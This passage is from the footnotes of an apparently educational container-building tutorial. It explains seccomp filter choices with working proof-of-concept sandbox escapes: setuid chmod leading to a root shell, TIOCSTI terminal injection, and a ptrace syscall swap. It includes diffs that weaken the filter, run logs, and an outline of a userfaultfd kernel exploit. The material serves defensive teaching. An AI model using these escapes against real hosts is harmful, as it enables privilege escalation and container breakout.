-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmod), 1,
-				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISUID, S_ISUID))
-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmod), 1,
-				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISGID, S_ISGID))
-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmodat), 1,
-				SCMP_A2(SCMP_CMP_MASKED_EQ, S_ISUID, S_ISUID))
-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmodat), 1,
-				SCMP_A2(SCMP_CMP_MASKED_EQ, S_ISGID, S_ISGID))
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(unshare), 1,
 				SCMP_A0(SCMP_CMP_MASKED_EQ, CLONE_NEWUSER, CLONE_NEWUSER))
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(clone), 1,

[lizzie@empress l-c-i-500-l]$sudo ./contained -m . -u 0 -c ./self_setuid
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.EXwjdL...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.  ++ chmod / fchmod / fchmodat failed:
Operation not permitted
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$sudo ./contained.allow_chmod -m . -u 0 -c ./self_setuid
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.35HO0W...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$./self_setuid shell
sh-4.3#whoami
root
sh-4.3# exit
[lizzie@empress l-c-i-500-l]$rm ./self_setuid

⁴⁹

I heard about this pretty recently because of CVE-2016-7545, an SELinux bug:

Listing 118: CVE-2016-7545 -- SELinux sandbox escape from Federico Bento

Hi,

When executing a program via the SELinux sandbox, the nonpriv session
can escape to the parent session by using the TIOCSTI ioctl to push
characters into the terminal's input buffer, allowing an attacker to
escape the sandbox.

$ cat test.c
#include <unistd.h>
#include <sys/ioctl.h>

int main()
{
     char *cmd = "id\n";
     while(*cmd)
      ioctl(0, TIOCSTI, cmd++);
     execlp("/bin/id", "id", NULL);
}

$ gcc test.c -o test
$ /bin/sandbox ./test
id
uid=1000 gid=1000 groups=1000
context=unconfined_u:unconfined_r:sandbox_t:s0:c47,c176
$ id    <------ did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

Bug report:
https://bugzilla.redhat.com/show_bug.cgi?id=1378577

Upstream fix:
https://marc.info/?l=selinux&m=147465160112766&w=2
https://marc.info/?l=selinux&m=147466045909969&w=2
https://github.com/SELinuxProject/selinux/commit/acca96a135a4d2a028ba9b636886af99c0915379

Federico Bento.

Listing 119: tiocsti.c

/* -*- compile-command: "gcc -Wall -Werror -static tiocsti.c -o tiocsti" -*- */
/* adapted from http://www.openwall.com/lists/oss-security/2016/09/25/1 */
#include <unistd.h>
#include <sys/ioctl.h>
#include <stdio.h>

int main()
{
     for (char *cmd = "id\n"; *cmd; cmd++) {
	     if (ioctl(STDIN_FILENO, TIOCSTI, cmd)) {
		     fprintf(stderr, "++ ioctl failed: %m\n");
		     return 1;
	     }
     }
     return 0;
}

Listing 120: allow_tiocsti.diff

diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..5fb25bd 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -167,8 +167,6 @@ int syscalls()
 				SCMP_A0(SCMP_CMP_MASKED_EQ, CLONE_NEWUSER, CLONE_NEWUSER))
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(clone), 1,
 				SCMP_A0(SCMP_CMP_MASKED_EQ, CLONE_NEWUSER, CLONE_NEWUSER))
-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(ioctl), 1,
-				SCMP_A1(SCMP_CMP_MASKED_EQ, TIOCSTI, TIOCSTI))
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(keyctl), 0)
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(add_key), 0)
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(request_key), 0)

[lizzie@empress l-c-i-500-l]$ sudo ./contained -m . -u 0 -c ./tiocsti 
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.P5QATt...done.
=> trying a user namespace...writing /proc/1819/uid_map...writing
/proc/1819/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.  ++ ioctl failed: Operation not
permitted
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_tiocsti -m . -u 0 -c ./tiocsti 
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.J9mulv...done.
=> trying a user namespace...writing /proc/1865/uid_map...writing
/proc/1865/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
id
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ uid=1000(lizzie) gid=1000(lizzie) groups=1000(lizzie)

⁵⁰

There's a notion of "user keyrings", that I believe are user-namespaced, but that's it.

Listing 122: man 7 keyrings

	User keyrings
		Each UID known to the kernel has a record that contains
		two  keyrings: The  user keyring  and the  user session
		keyring.  These exist for as  long as the UID record in
		the  kernel exists.   A  link to  the  user keyring  is
		placed in a  new session keyring by  pam_keyinit when a
		new login session is initiated.

⁵¹

man 2 seccomp says:

The seccomp check will not be run again after the tracer is notified. (This means that seccomp-based sandboxes must not allow use of ptrace(2)–even of other sandboxed processes–without extreme care; ptracers can use this mechanism to escape from the seccomp sandbox.)

Here's an example (remember that our seccomp profile should prevent chmod(x, I_SUID):

Listing 124: ptrace_breaks_seccomp.c

/* -*- compile-command: "gcc -Wall -Werror -static ptrace_breaks_seccomp.c -o ptrace_breaks_seccomp" -*- */
#include <sys/stat.h>
#include <stdio.h>
#include <sys/ptrace.h>
#include <unistd.h>
#include <sys/types.h>
#include <signal.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <stddef.h>
#include <sys/syscall.h>

#define MAGIC_SYSCALL 666

int main (int argc, char **argv)
{
	pid_t child = 0;
	switch ((child = fork())) {
	case -1:
		fprintf(stderr, "++ fork failed: %m\n");
		return 1;
	case 0:;
		fprintf(stderr, "++ child stopping itself.\n");
		if (kill(getpid(), SIGSTOP)) {
			fprintf(stderr, "++ kill failed: %m\n");
			return 1;
		}
		fprintf(stderr, "++ child continued\n");
		/* pick an arbitrary syscall number. our tracer will change it to chmod. */
		if (syscall(MAGIC_SYSCALL, argv[0], S_ISUID | S_IRUSR | S_IWUSR | S_IXUSR)) {
			fprintf(stderr, "chmod-via-nanosleep failed: %m\n");
			return 1;
		}
		fprintf(stderr, "++ chmod succeeded, child finished.\n");
		break;
	default:;
		int status = 0;
		if (ptrace(PTRACE_ATTACH,child, NULL, NULL)) {
			fprintf(stderr, "++ ptrace failed: %m\n");
			return 1;
		}
		waitpid(child, &status, 0);
		if (!(status & SIGSTOP)) {
			fprintf(stderr, "++ expected SIGSTOP in child.\n");
			return 1;
		}
		struct user_regs_struct regs = {0};
		while (1) {
			if (ptrace(PTRACE_GETREGS, child, 0, &regs)) {
				fprintf(stderr, "++ getting child registers failed: %m\n");
				return 1;
			}
			if (!(regs.orig_rax == MAGIC_SYSCALL)) {
				if (ptrace(PTRACE_SYSCALL, child, 0, 0)) {
					fprintf(stderr, "++ continuing the process failed.\n");
					return 1;
				}
				waitpid(child, &status, 0);
				if (!(status & SIGTRAP)) {
					fprintf(stderr, "++ expected SIGTRAP in child.\n");
					return 1;
				}
			} else {
				fprintf(stderr, "++ got MAGIC_SYSCALL!\n");
				regs.orig_rax = SYS_chmod;
				if (ptrace(PTRACE_SETREGS, child, 0, &regs)) {
					fprintf(stderr, "++ continuing child failed: %m\n");
					return 1;
				}
				if (ptrace(PTRACE_CONT, child, 0, 0)) {
					fprintf(stderr, "++ continuing child failed: %m\n");
					return 1;
				}
				break;
			}
		}
		waitpid(child, NULL, 0);
		fprintf(stderr, "++ finished waiting.\n");

		break;
	}
	return 0;
}

Listing 125: allow_ptrace.diff

diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 2291ecb..42ecbc6 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -173,7 +173,6 @@ int syscalls()
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(keyctl), 0)
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(add_key), 0)
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(request_key), 0)
-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(ptrace), 0)
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(mbind), 0)
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(migrate_pages), 0)
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(move_pages), 0)

[lizzie@empress l-c-i-500-l]$ sudo ./contained -m . -u 0 -c ./ptrace_breaks_seccomp 
=> validating Linux version...4.7.6-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.EiZRVH...done.
=> trying a user namespace...unsupported? continuing.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ child stopping itself.
++ ptrace failed: Operation not permitted
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_ptrace -m . -u 0 -c ./ptrace_breaks_seccomp 
=> validating Linux version...4.7.6-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.ThyjKm...done.
=> trying a user namespace...unsupported? continuing.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ child stopping itself.
++ child continued
++ got MAGIC_SYSCALL!
++ chmod succeeded, child finished.
++ finished waiting.
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ ls -lh ptrace_breaks_seccomp 
-rws------ 1 lizzie lizzie 793K Oct 11 14:55 ptrace_breaks_seccomp

This seems to have been fixed in June by Kees Cook:

Listing 126: run seccomp after ptrace on LKML

There has been a long-standing (and documented) issue with seccomp
where ptrace can be used to change a syscall out from under seccomp.
This is a problem for containers and other wider seccomp filtered
environments where ptrace needs to remain available, as it allows
for an escape of the seccomp filter.

Since the ptrace attack surface is available for any allowed syscall,
moving seccomp after ptrace doesn't increase the actually available
attack surface. And this actually improves tracing since, for
example, tracers will be notified of syscall entry before seccomp
sends a SIGSYS, which makes debugging filters much easier.

The per-architecture changes do make one (hopefully small)
semantic change, which is that since ptrace comes first, it may
request a syscall be skipped. Running seccomp after this doesn't
make sense, so if ptrace wants to skip a syscall, it will bail
out early similarly to how seccomp was. This means that skipped
syscalls will not be fed through audit, though that likely means
we're actually avoiding noise this way.

This series first cleans up seccomp to remove the now unneeded
two-phase entry, fixes the SECCOMP_RET_TRACE hole (same as the
ptrace hole above), and then reorders seccomp after ptrace on
each architecture.

Thanks,

-Kees

This patchset made it into the kernel at 4.8. See for example 93e35e:

  [lizzie@empress linux-stable]$ git branch --contains 93e35efb8de45393cf61ed07f7b407629bf698ea
  * linux-4.8.y
    master

⁵²

This is, as far as I can tell, only documented in the kernel tree:

Listing 129: Documentation/vm/userfaultfd.txt@c8d2bc

= Userfaultfd =

== Objective ==

Userfaults allow the implementation of on-demand paging from userland
and more generally they allow userland to take control of various
memory page faults, something otherwise only the kernel code could do.

[...]

= API ==

When first opened the userfaultfd must be enabled invoking the
UFFDIO_API ioctl specifying a uffdio_api.api value set to UFFD_API (or
a later API version) which will specify the read/POLLIN protocol
userland intends to speak on the UFFD and the uffdio_api.features
userland requires. The UFFDIO_API ioctl if successful (i.e. if the
requested uffdio_api.api is spoken also by the running kernel and the
requested features are going to be enabled) will return into
uffdio_api.features and uffdio_api.ioctls two 64bit bitmasks of
respectively all the available features of the read(2) protocol and
the generic ioctl available.

Once the userfaultfd has been enabled the UFFDIO_REGISTER ioctl should
be invoked (if present in the returned uffdio_api.ioctls bitmask) to
register a memory range in the userfaultfd by setting the
uffdio_register structure accordingly. The uffdio_register.mode
bitmask will specify to the kernel which kind of faults to track for
the range (UFFDIO_REGISTER_MODE_MISSING would track missing
pages). The UFFDIO_REGISTER ioctl will return the
uffdio_register.ioctls bitmask of ioctls that are suitable to resolve
userfaults on the range registered. Not all ioctls will necessarily be
supported for all memory types depending on the underlying virtual
memory backend (anonymous memory vs tmpfs vs real filebacked
mappings).

Userland can use the uffdio_register.ioctls to manage the virtual
address space in the background (to add or potentially also remove
memory from the userfaultfd registered range). This means a userfault
could be triggering just before userland maps in the background the
user-faulted page.

The primary ioctl to resolve userfaults is UFFDIO_COPY. That
atomically copies a page into the userfault registered range and wakes
up the blocked userfaults (unless uffdio_copy.mode &
UFFDIO_COPY_MODE_DONTWAKE is set). Other ioctl works similarly to
UFFDIO_COPY. They're atomic as in guaranteeing that nothing can see an
half copied page since it'll keep userfaulting until the copy has
finished.

⁵³

Jann Horn described this to me, and linked to his vulnerability and exploit:

In order to make exploitation more reliable, the attacker should be able to pause code execution in the kernel between the writability check of the target file and the actual write operation. This can be done by abusing the writev() syscall and FUSE: The attacker mounts a FUSE filesystem that artificially delays read accesses, then mmap()s a file containing a struct iovec from that FUSE filesystem and passes the result of mmap() to writev(). (Another way to do this would be to use the userfaultfd() syscall.)

It was also used by Vitaly Nikolenko in his proof-of-concept for CVE-2016-6187:

[…]

If we could overwrite the cleanup function pointer (remember that this object is now allocated in user space), then we'll have arbitrary code execution with CPL=0. The only problem is that subprocess_info object allocation and freeing happens on the same path. One way to modify the object's function pointer is to somehow suspend the execution before info->cleanup)(info) gets called and set the function pointer to our privilege escalation payload. I could have found other objects of the same size with two "separate" paths for allocation and function triggering but I needed a reason to try userfaultfd() and the page splitting idea.

The userfaultfd syscall can be used to handle page faults in user space. We can allocate a page in user space and set up a handler (as a separate thread); when this page is accessed either for reading or writing, execution will be transferred to the user-space handler to deal with the page fault. There's nothing new here and this was mentioned by Jann Hornh

[…].

Allocate two consecutive pages, split the object over these two pages (as before) and set up the page handler for the second page.

When the user-space PF is triggered by memset, set up another user-space PF handler but for the first page.

The next user-space PF will be triggered when object variables (located in the first page) get initialised in call_usermodehelper_setup. At this point, set up another PF for the second page.

Finally, the last user-space PF handler can modify the cleanup function pointer (by setting it to our privilege escalation payload or a ROP chain) and set the path member to 0 (since these members are all located in the first page and already initialised).

Setting up user-space PF handlers for already "page-faulted" pages can be accomplished by munmapping/mapping these pages again and then passing them to userfaultfd(). The PoC for 4.5.1 can be found here. There's nothing specific to the kernel version though (it should work on all vulnerable kernels). There's no privilege escalation payload but the PoC will execute instructions at the user-space address 0xdeadbeef.

⁵⁴

Listing 131: man 2 perf_event_open

    PERF_EVENT_OPEN(2) -- 2016-07-17 -- Linux -- Linux Programmer's Manual

    NAME
            perf_event_open - set up performance monitoring

    SYNOPSIS
            #include <linux/perf_event.h>
            #include <linux/hw_breakpoint.h>

            int perf_event_open(struct perf_event_attr *attr,
                                            pid_t pid, int cpu, int group_fd,
                                            unsigned long flags);

            Note: There  is no glibc  wrapper for this system  call; see
            NOTES.

    DESCRIPTION
            [...]

    Arguments

         The pid and cpu arguments allow specifying which process and
         CPU to monitor:

         pid == 0 and cpu == -1
                 This measures the calling process/thread on any CPU.

         pid == 0 and cpu >= 0
                 This  measures  the  calling process/thread  only  when
                 running on the specified CPU.

         pid > 0 and cpu == -1
                 This measures the specified process/thread on any CPU.

         pid > 0 and cpu >= 0
                 This  measures the  specified process/thread  only when
                 running on the specified CPU.

         pid == -1 and cpu >= 0
                 This  measures all  processes/threads on  the specified
                 CPU.   This  requires  CAP_SYS_ADMIN  capability  or  a
                 /proc/sys/kernel/perf_event_paranoid value of less than
                 1.

         pid == -1 and cpu == -1
                 This setting is invalid and will return an error.

If a pid is specified, the corresponding process is found within the namespace:

Listing 132: kernel/events/core.c:9376@c8d2bc

    /**
     * sys_perf_event_open - open a performance event, associate it to a task/cpu
     *
     * @attr_uptr:  event_id type attributes for monitoring/sampling
     * @pid:                target pid
     * @cpu:                target cpu
     * @group_fd:           group leader event fd
     */
    SYSCALL_DEFINE5(perf_event_open,
                    struct perf_event_attr __user *, attr_uptr,
                    pid_t, pid, int, cpu, int, group_fd, unsigned long, flags)
    {
            /* ... */

            if (pid != -1 && !(flags & PERF_FLAG_PID_CGROUP)) {
                    task = find_lively_task_by_vpid(pid);
                    if (IS_ERR(task)) {
                            err = PTR_ERR(task);
                            goto err_group_fd;
                    }
            }

            /* ... */
    }

Listing 133: kernel/events/core.c:3621@c8d2bc

    static struct task_struct *
    find_lively_task_by_vpid(pid_t vpid)
    {
            struct task_struct *task;

            rcu_read_lock();
            if (!vpid)
                    task = current;
            else
                    task = find_task_by_vpid(vpid);
            if (task)
                    get_task_struct(task);
            rcu_read_unlock();

            if (!task)
                    return ERR_PTR(-ESRCH);

            return task;
    }

Listing 134: kernel/pid.c:459@c8d2bc

    struct task_struct *find_task_by_vpid(pid_t vnr)
    {
            return find_task_by_pid_ns(vnr, task_active_pid_ns(current));
    }

⁵⁵

The Relevant commit is 0161028, whose commit message gives a good description of the problems:

commit 0161028b7c8aebef64194d3d73e43bc3b53b5c66
Author: Andy Lutomirski <redacted>
Date:   Mon May 9 15:48:51 2016 -0700

    perf/core: Change the default paranoia level to 2
    
    Allowing unprivileged kernel profiling lets any user dump follow kernel
    control flow and dump kernel registers.  This most likely allows trivial
    kASLR bypassing, and it may allow other mischief as well.  (Off the top
    of my head, the PERF_SAMPLE_REGS_INTR output during /dev/urandom reads
    could be quite interesting.)
    
    Signed-off-by: Andy Lutomirski <redacted>
    Acked-by: Kees Cook <redacted>
    Signed-off-by: Linus Torvalds <redacted>

diff --git a/Documentation/sysctl/kernel.txt b/Documentation/sysctl/kernel.txt
index 57653a4..fcddfd5 100644
--- a/Documentation/sysctl/kernel.txt
+++ b/Documentation/sysctl/kernel.txt
@@ -645,7 +645,7 @@ allowed to execute.
 perf_event_paranoid:
 
 Controls use of the performance events system by unprivileged
-users (without CAP_SYS_ADMIN).  The default value is 1.
+users (without CAP_SYS_ADMIN).  The default value is 2.
 
  -1: Allow use of (almost) all events by all users
 >=0: Disallow raw tracepoint access by users without CAP_IOC_LOCK
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 4e2ebf6..c0ded24 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -351,7 +351,7 @@ static struct srcu_struct pmus_srcu;
  *   1 - disallow cpu events for unpriv
  *   2 - disallow kernel profiling for unpriv
  */
-int sysctl_perf_event_paranoid __read_mostly = 1;
+int sysctl_perf_event_paranoid __read_mostly = 2;
 
 /* Minimum for 512 kiB + 1 user control page */

This is included in 4.6:

[lizzie@empress linux]$ git tag --contains 0161028b7c8aebef64194d3d73e43bc3b53b5c66
v4.6
v4.7
v4.7-rc1
v4.7-rc2
v4.7-rc3
v4.7-rc4
v4.7-rc5
v4.7-rc6
v4.7-rc7
v4.8
v4.8-rc1
v4.8-rc2
v4.8-rc3
v4.8-rc4
v4.8-rc5
v4.8-rc6
v4.8-rc7
v4.8-rc8

Thanks to Jann Horn for pointing this out.

⁵⁶

Documentation/prctl/no_new_privs.txt@c8d2bc

The execve system call can grant a newly-started program privileges that its parent did not have. The most obvious examples are setuid/setgid programs and file capabilities. […] Any task can set no_new_privs. Once the bit is set, it is inherited across fork, clone, and execve and cannot be unset. With no_new_privs set, execve promises not to grant the privilege to do anything that could not have been done without the execve call.

Listing 136: man 2 seccomp

		In order to  use the SECCOMP_SET_MODE_FILTER operation,
		either   the  caller   must   have  the   CAP_SYS_ADMIN
		capability in  its user  namespace, or the  thread must
		already have the no_new_privs bit set.  If that bit was
		not  already set  by an  ancestor of  this thread,  the
		thread must make the following call:

		    prctl(PR_SET_NO_NEW_PRIVS, 1);

		Otherwise,  the SECCOMP_SET_MODE_FILTER  operation will
		fail  and return  EACCES  in  errno.  This  requirement
		ensures  that an  unprivileged process  cannot apply  a
		malicious filter and then invoke a set-user-ID or other
		privileged  program using  execve(2), thus  potentially
		compromising  that program.   (Such a  malicious filter
		might, for  example, cause an attempt  to use setuid(2)
		to  set the  caller's user  IDs to  non-zero values  to
		instead  return 0  without actually  making the  system
		call.   Thus,   the  program  might  be   tricked  into
		retaining superuser  privileges in  circumstances where
		it is possible  to influence it to  do dangerous things
		because it did not actually drop privileges.)

It took me a while to internalize this behavior. My impression was that without PR_SET_NO_NEW_PRIVS, seccomp filters would be dropped across a setuid exec. This would lead to an easy way to escape seccomp:

Create a setuid executable that calls some filtered syscall.
Become a non-root user.
Execute that setuid executable.

But that's actually not the case. Instead, you just can't set seccomp filters unless you have one of the following:

PR_SET_NO_NEW_PRIVS == 1
CAP_SYS_ADMIN

and so libseccomp sets PR_SET_NO_NEW_PRIVS by default.

Here's the code I thought would work:

Listing 137: setuidd_lower_reexec_and_escape.c

/* -*- compile-command: "gcc -Wall -Werror -static setuidd_lower_reexec_and_escape.c -o setuidd_lower_reexec_and_escape" -*- */
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sys/ioctl.h>

int main (int argc, char **argv)
{
	if (argc == 1) {
		if (setresuid(99, 99, 99)) {
			fprintf(stderr, "++ setresuid failed: %m\n");
			return 1;
		}
		if (execve(argv[0], (char *[]) {argv[0], "-", 0}, NULL)) {
			fprintf(stderr, "++ execve failed: %m\n");
			return 1;
		}
	} else {
		uid_t a, b, c = 0;
		getresuid(&a, &b, &c);
		fprintf(stderr, "++ we're %u/%u/%u.\n", a, b, c);
		if (ioctl(STDIN_FILENO, TIOCSTI, "!")) {
		     fprintf(stderr, "++ ioctl failed: %m\n");
		     return 1;
		}
	}
}

but it doesn't :

[lizzie@empress l-c-i-500-l]$sudo chown root setuidd_lower_reexec_and_escape
[lizzie@empress l-c-i-500-l]$sudo chmod 4007 setuidd_lower_reexec_and_escape
[lizzie@empress l-c-i-500-l]$sudo ./contained -m . -u 0 -c ./setuidd_lower_reexec_and_escape
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.ZM2vnz...done.
=> trying a user namespace...writing /proc/2095/uid_map...writing
/proc/2095/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.  ++ we're 99/99/99.  ++ ioctl failed:
Operation not permitted
=> cleaning cgroups...done.

Here's the code responsible for that check:

Listing 138: kernel/seccomp.c:340@c8d2bc

/**
 * seccomp_prepare_filter: Prepares a seccomp filter for use.
 * @fprog: BPF program to install
 *
 * Returns filter on success or an ERR_PTR on failure.
 */
static struct seccomp_filter *seccomp_prepare_filter(struct sock_fprog *fprog)
{
	struct seccomp_filter *sfilter;
	int ret;
	const bool save_orig = IS_ENABLED(CONFIG_CHECKPOINT_RESTORE);

	if (fprog->len == 0 || fprog->len > BPF_MAXINSNS)
		return ERR_PTR(-EINVAL);

	BUG_ON(INT_MAX / fprog->len < sizeof(struct sock_filter));

	/*
	 * Installing a seccomp filter requires that the task has
	 * CAP_SYS_ADMIN in its namespace or be running with no_new_privs.
	 * This avoids scenarios where unprivileged tasks can affect the
	 * behavior of privileged children.
	 */
	if (!task_no_new_privs(current) &&
	    security_capable_noaudit(current_cred(), current_user_ns(),
				     CAP_SYS_ADMIN) != 0)
		return ERR_PTR(-EACCES);

	/* Allocate a new seccomp_filter */
	sfilter = kzalloc(sizeof(*sfilter), GFP_KERNEL | __GFP_NOWARN);
	if (!sfilter)
		return ERR_PTR(-ENOMEM);

	ret = bpf_prog_create_from_user(&sfilter->prog, fprog,
					seccomp_check_filter, save_orig);
	if (ret < 0) {
		kfree(sfilter);
		return ERR_PTR(ret);
	}

	atomic_set(&sfilter->usage, 1);

	return sfilter;
}

and the code that unconditionally propagates seccomp filters across exec:

Listing 139: kernel/fork.c:1268@c8d2bc

static void copy_seccomp(struct task_struct *p)
{
#ifdef CONFIG_SECCOMP
	/*
	 * Must be called with sighand->lock held, which is common to
	 * all threads in the group. Holding cred_guard_mutex is not
	 * needed because this new task is not yet running and cannot
	 * be racing exec.
	 */
	assert_spin_locked(&current->sighand->siglock);

	/* Ref-count the new filter user, and assign it. */
	get_seccomp_filter(current);
	p->seccomp = current->seccomp;

	/*
	 * Explicitly enable no_new_privs here in case it got set
	 * between the task_struct being duplicated and holding the
	 * sighand lock. The seccomp state and nnp must be in sync.
	 */
	if (task_no_new_privs(current))
		task_set_no_new_privs(p);

	/*
	 * If the parent gained a seccomp mode after copying thread
	 * flags and between before we held the sighand lock, we have
	 * to manually enable the seccomp thread flag here.
	 */
	if (p->seccomp.mode != SECCOMP_MODE_DISABLED)
		set_tsk_thread_flag(p, TIF_SECCOMP);
#endif
}

(called by copy_process in kernel/fork.c@c8d2bc).

⁵⁷

Listing 170: man 2 _sysctl

NOTES
	Glibc does not provide a  wrapper for this system call; call
	it using  syscall(2).  Or rather...   don't call it:  use of
	this system  call has  long been discouraged,  and it  is so
	unloved that  it is likely  to disappear in a  future kernel
	version.   Since  Linux 2.6.24,  uses  of  this system  call
	result in warnings  in the kernel log.  Remove  it from your
	programs now; use the /proc/sys interface instead.

	This  system  call  is  available only  if  the  kernel  was
	configured with the CONFIG_SYSCTL_SYSCALL option.

Listing 171: init/Kconfig:1420@c8d2bc

config SYSCTL_SYSCALL
	bool "Sysctl syscall support" if EXPERT
	depends on PROC_SYSCTL
	default n
	select SYSCTL
	---help---
	  sys_sysctl uses binary paths that have been found challenging
	  to properly maintain and use.  The interface in /proc/sys
	  using paths with ascii names is now the primary path to this
	  information.

	  Almost nothing using the binary sysctl interface so if you are
	  trying to save some space it is probably safe to disable this,
	  making your kernel marginally smaller.

	  If unsure say N here.

⁵⁸

Listing 172: man 2 alloc_hugepages

DESCRIPTION
	The system calls alloc_hugepages() and free_hugepages() were
	introduced  in Linux  2.5.36  and removed  again in  2.5.54.
	They  existed  only  on  i386  and  ia64  (when  built  with
	CONFIG_HUGETLB_PAGE).  In Linux  2.4.20, the syscall numbers
	exist, but the calls fail with the error ENOSYS.

⁵⁹

Listing 173: man 2 bdflush

DESCRIPTION
	Note: Since  Linux 2.6, this  system call is  deprecated and
	does nothing.   It is  likely to  disappear altogether  in a
	future  kernel release.   Nowadays,  the  task performed  by
	bdflush() is handled by the kernel pdflush thread.

⁶⁰

Listing 169: man 2 create_module

DESCRIPTION
	Note: This  system call  is present  only in  kernels before
	Linux 2.6.

⁶¹

Listing 167: man 2 nfsservctl

NAME
	nfsservctl - syscall interface to kernel nfs daemon

SYNOPSIS
	#include <linux/nfsd/syscall.h>

	long nfsservctl(int cmd, struct nfsctl_arg *argp,
				 union nfsctl_res *resp);

DESCRIPTION
	Note: Since  Linux 3.1, this  system call no  longer exists.
	It  has  been  replaced  by  a set  of  files  in  the  nfsd
	filesystem; see nfsd(7).

⁶²

Listing 158: man 2 syscalls

	perfctr(2)	2.2	Sparc; removed in 2.6.34

⁶³

Listing 146: man 2 get_kernel_syms

GET_KERNEL_SYMS(2) -- 2016-10-08 -- Linux -- Linux Programmer's Manual

NAME
	get_kernel_syms  -  retrieve   exported  kernel  and  module
	symbols

SYNOPSIS
	#include <linux/module.h>

	int get_kernel_syms(struct kernel_sym *table);

	Note:  No declaration  of this  system call  is provided  in
	glibc headers; see NOTES.

DESCRIPTION
	Note: This  system call  is present  only in  kernels before
	Linux 2.6.

⁶⁴

Listing 154: man 2 setup

SETUP(2) -- 2008-12-03 -- Linux -- Linux Programmer's Manual

NAME
	setup - setup devices and filesystems, mount root filesystem

	[...]

VERSIONS
	Since Linux 2.1.121, no such function exists anymore.

⁶⁵

man 2 clock_settime is unfortunately pretty vague:

Listing 160: man 2 clock_settime

    CLOCK_GETRES(2) -- 2016-05-09 -- Linux Programmer's Manual

    NAME
            clock_getres, clock_gettime, clock_settime  - clock and time
            functions

            [...]

    ERRORS

            EFAULT
                    tp points outside the accessible address space.

            EINVAL
                    The clk_id specified is not supported on this system.

            EPERM
